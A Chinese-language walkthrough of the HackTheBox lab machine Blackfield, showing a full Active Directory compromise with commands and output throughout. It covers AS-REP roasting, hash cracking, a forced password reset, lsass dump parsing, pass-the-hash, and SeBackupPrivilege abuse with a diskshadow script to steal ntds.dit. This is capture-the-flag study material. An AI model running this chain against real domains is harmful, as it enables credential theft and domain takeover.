Blackfield on HackTheBox

, , , , ,

Before all

Victim’s IP : 10.10.10.192
Victim’s Host : *.blackfield.locacl
Attacker’s IP : 10.10.14.14

RECON

port scan

Command 

1
rustscan -a 10.10.10.192 --ulimit 5000 -- -sC -sV -Pn

Result 

1
2
3
4
5
6
7
8
9
10
11
12
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-26 14:03:18Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

又是一台常規的 AD DC,有開 smb, ldap, rpc, kerberos,也能獲得域名:blackfield.local

Exploit

smb info leak

SMB 可以無帳密登入
Command 

1
smbclient -L //10.10.10.192/ -N

Result 

1
2
3
4
5
6
7
8
9
10
11
12
13
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

一一嘗試,於profiles$發現大量使用者名稱,一一進行爆破 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
smbclient //10.10.10.192/profiles$ -N          
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  ABekesz                             D        0  Wed Jun  3 12:47:11 2020
  ABenzies                            D        0  Wed Jun  3 12:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 12:47:11 2020
  AChampken                           D        0  Wed Jun  3 12:47:11 2020
  ACheretei                           D        0  Wed Jun  3 12:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 12:47:11 2020
  AHigchens                           D        0  Wed Jun  3 12:47:11 2020
  AJaquemai                           D        0  Wed Jun  3 12:47:11 2020
  AKlado                              D        0  Wed Jun  3 12:47:11 2020
  AKoffenburger                       D        0  Wed Jun  3 12:47:11 2020
......(略)

利用 kerbrute 進行使用者名稱列舉:
Command 

1
kerbrute userenum -d BLACKFIELD.local --dc 10.10.10.192 userlist.txt
1
2
3
4
5
6
7
8
9
10
11
12
13

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/26/24 - Ronnie Flathers @ropnop

2024/12/26 01:21:18 >  Using KDC(s):
2024/12/26 01:21:18 >   10.10.10.192:88

2024/12/26 01:21:24 >  [+] VALID USERNAME:       [email protected]

AS-REP Roasting

利用 impacket-GetNPUsers 嘗試進行 AS-REP Roasting: 

1
impacket-GetNPUsers -dc-ip 10.10.10.192 -request -k -usersfile userlist.txt blackfield.local/
1
[email protected]:22deb12d556b6b2883f8053667d775c9$57473ab335b4fc89f83ed373107f6136800b0d2d5f77ebe4bf2b27b4bd27016a8b89f02d69a17b4d2c4b7da6237f87e9662d107ceb273f0fdb0edcaf139019168638db5e6685e118036fe0d6e51e58d521e9aa85b63c2220d88e0a1298f704c9c5cfe45162695ed036c09cd72f2a2517ea105a72c1e99da72c07ecfc8a3a53dfd4f987c6ded59471b8767df9eb0ab37043358fbf5364ca177987dc3bc1c1a1eed6603f200f250ffd1e57b2b86fcfbda19e6e1328422e43d127c54f50913037a555bdee01cb8110c3f3ec9b12bac5b9fd24a6610ed360b8e80ea1d0054472598fa7c2e2537b9c396c5735df552f55ab39bd143424

將獲得的 TGT 透過 john 進行爆破: 

1
john hash --wordlist=/home/kali/rockyou.txt

獲得密碼:#00^BlackKnight

ForceChangePassword

先以 bloodhound 進行域資訊蒐集: 

1
bloodhound-python -c All -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 --zip

注意到 support 可以幫 audit2020 換密碼
image
先用 rpcclient 進行連接 

1
rpcclient -U support //10.10.10.192

接下來在 rpc 幫他換密碼: 

1
rpcclient $> setuserinfo2 AUDIT2020 23 Whale120

lsass to PSRemote

注意到 forensic 資料夾有 \memory_analysis\lsass.zip,因為 lsass 是處理驗證的服務,蠻有可能有一些資料,把他 get 下來後 unzip,file知道是 Mini Dump 資料
以 pypykatz dump 出來 

1
pypykatz lsa minidump lsass.DMP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
        == WDIGEST [633ba]==

注意到獲得了 svc_backup 的 NT Hash,以 evil-winrm 進行 Pass The Hash 攻擊嘗試登入並成功 

1
evil-winrm -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' -i blackfield.local

Privilege Escalation

登入後用 whoami /priv 指令做權限檢查 

1
2
3
4
5
6
7
8
9
10
11
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

有 SeBackupPrivilege,可以利用它把 NTDS 及主機的 SYSTEM 都複製並下載到本地做 NTLM HASH 提取
利用特製的.dsh file搭配diskshadow進行槽複製:

exp.dsh: 

1
2
3
4
set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:

接著在Evil-Winrm做以下操作: 

1
2
3
4
5
mkdir /Temp
cd /Temp
diskshadow /s viper.dsh
robocopy /b x:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system

到這邊基本上已經把檔案都複製到C:\Temp
最後用Evil-Winrm的download指令把他們抓到本地就好ㄌowob

本地轉譯成NTLM HASH:
利用Impacket庫的secretsdump 

1
impacket-secretsdump -ntds ntds.dit -system system LOCAL | grep Administrator

最後把拿到的NT HASH打Pass The Hash Attack即可: 

evil-winrm -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee' -i blackfield.local